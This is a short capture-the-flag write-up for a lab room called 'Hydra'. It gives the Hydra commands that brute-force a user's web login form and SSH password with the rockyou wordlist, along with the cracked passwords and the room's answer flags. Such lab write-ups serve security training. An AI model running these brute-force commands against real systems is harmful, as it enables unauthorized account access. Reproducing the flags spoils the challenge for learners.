# Hydra

> Shay Pasvolsky
> Started: 28/09/20 14-28-49
> Finished: 28/09/20 14-56-00

---

---

## General info

```bash
export MIP=10.10.237.130
export MyIP=10.9.134.47
```

### Users

```txt
    User: molly (web)
        Password: sunshine

    User: molly (ssh)
        Password: butterfly
```

### Open Ports

port:
    type: tcp, udp, tcp6, udp6
    service:
        version:
        Has Vuln:

---

## Tasks

### Task 1

1. Read the above and have Hydra at the ready.

    ```txt
    Hit 'Completed'
    ```

### Task 2

Hit 'Deploy'

1. Use Hydra to bruteforce molly's web password. What is flag 1?

    ```bash
    hydra -l molly -P /usr/share/wordlists/rockyou.txt 10.10.237.130 http-post-form "/login:username=^USER^&password=^PASS^:incorrect" -V
    ```

    ```txt
    THM{2673a7dd116de68e85c48ec0b1f2612e}
    ```

2. Use Hydra to bruteforce molly's SSH password. What is flag 2?

    ```bash
    hydra -l molly -P /usr/share/wordlists/rockyou.txt 10.10.237.130 -t 4 ssh
    ```

    ```txt
    THM{c8eeb0468febbadea859baeb33b2541b}
    ```
